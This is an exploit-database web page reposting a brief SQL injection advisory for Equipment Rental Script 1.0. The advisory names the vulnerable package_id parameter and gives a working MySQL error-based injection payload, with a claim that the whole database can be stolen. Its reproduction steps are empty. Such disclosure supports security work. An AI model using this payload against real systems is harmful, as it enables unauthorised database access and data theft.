Equipment Rental Script-1.0 SQLi

CVE Category Price Severity
N/A CWE-89 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2024-02-06

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

Equipment Rental Script-1.0 SQLi
## Title: Equipment Rental Script-1.0 - SQLi
## Author: nu11secur1ty
## Date: 09/12/2023
## Vendor:
## Software:
## Reference:

## Description:
The package_id parameter appears to be vulnerable to SQL injection
attacks. The payload ' was submitted in the package_id parameter, and
a database error message was returned. You should review the contents
of the error message, and the application's handling of other input,
to confirm whether a vulnerability is present. The attacker can steal
all information from the database!


Parameter: #1* ((custom) POST)
    Type: error-based
    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
    Payload: package_id=(-4488))) OR 1 GROUP BY
CONCAT(0x71787a6a71,(SELECT (CASE WHEN (7794=7794) THEN 1 ELSE 0
END)),0x7176717671,FLOOR(RAND(0)*2)) HAVING

## Reproduce:

System Administrator - Infrastructure Engineer
Penetration Testing Engineer
home page:

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.